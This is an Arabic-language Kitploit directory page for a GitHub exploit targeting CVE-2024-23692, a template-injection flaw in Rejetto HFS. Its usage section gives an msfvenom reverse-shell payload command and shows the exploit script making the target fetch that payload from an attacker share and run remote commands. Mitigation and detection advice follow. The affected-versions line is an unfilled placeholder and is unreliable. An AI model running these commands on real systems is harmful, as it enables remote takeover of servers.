Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) هو خادم ملفات ويب بسيط يُسهّل مشاركة الملفات عبر شبكة أو عبر الإنترنت. | Kitploit
أدوات/GitHubGitHub/mr-r00t11/cve-2024-23692
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) هو خادم ملفات ويب بسيط يُسهّل مشاركة الملفات عبر شبكة أو عبر الإنترنت.

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Rejetto HFS (خادم ملفات HTTP) ثغرة CVE-2024-23692


نظرة عامة

Rejetto HFS (خادم ملفات HTTP) هو خادم ملفات ويب بسيط يسهّل مشاركة الملفات عبر الشبكة أو الإنترنت. على الرغم من سهولة استخدامه وبساطته، تم اكتشاف ثغرة حرجة (CVE-2024-23692) تجعل الخادم هدفًا للمهاجمين.


CVE-2024-23692: ثغرة حقن القوالب من جهة الخادم (SSTI)


الوصف

CVE-2024-23692 هي ثغرة حقن قوالب من جهة الخادم (SSTI) تم تحديدها في Rejetto HFS. تسمح هذه الثغرة للمهاجم بحقن قوالب خبيثة وتنفيذها على الخادم. إذا تم استغلالها، فقد تؤدي إلى تنفيذ تعليمات برمجية عن بُعد، مما قد يعرض الخادم بالكامل والبيانات المستضافة عليه للخطر.


الأثر

يمكن للمهاجم الذي يستغل هذه الثغرة:

  • تنفيذ تعليمات برمجية عشوائية على الخادم
  • الحصول على وصول غير مصرح به إلى البيانات الحساسة
  • المساس بسلامة الخادم وتوافره
  • استخدام الخادم المخترق لشن هجمات إضافية داخل الشبكة

الاستخدام

احصل على شل باستخدام ملف ثنائي خبيث تم إنشاؤه بواسطة msfvenom.

ملاحظة: اترك nc في وضع الاستماع.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

قم بتشغيل أمر عن بُعد.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

قد يستغرق عرض النتيجة حوالي 15 ثانية.

[Screenshot_2.png]


النسخ المتأثرة

جميع إصدارات Rejetto HFS حتى الإصدار [أدخل أحدث إصدار متأثر هنا] شاملةً إياه متأثرة بهذه الثغرة.


التخفيف

للتخفيف من المخاطر التي تشكلها CVE-2024-23692، يُنصح المستخدمون بما يلي:

  • تحديث إلى أحدث إصدار: تأكد من استخدام إصدار من Rejetto HFS تم فيه إصلاح هذه الثغرة. تحقق من الموقع الرسمي أو مستودع Rejetto HFS للحصول على أحدث التحديثات.
  • تطبيق أفضل الممارسات الأمنية: قيّد الوصول إلى خادم HFS على الشبكات والمستخدمين الموثوقين فقط. استخدم آليات مصادقة وتفويض قوية.
  • المراقبة والتدقيق: راقب الخادم بانتظام بحثًا عن أي نشاط غير معتاد ودقق السجلات لاكتشاف علامات الاستغلال.

الكشف

لتحديد ما إذا كان خادمك قد تعرض للاختراق، ابحث عن:

  • حركة مرور شبكة غير معتادة تنبع من الخادم
  • ملفات أو عمليات غير متوقعة على الخادم
  • تغييرات غير مصرح بها على إعدادات الخادم أو بياناته

الإبلاغ والمساعدة

لمزيد من المساعدة والدعم، راجع منتديات مجتمع Rejetto HFS أو قنوات الدعم الرسمية.


الموارد

  • الموقع الرسمي لـ Rejetto HFS
  • تفاصيل CVE-2024-23692

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.


تنزيل الأداة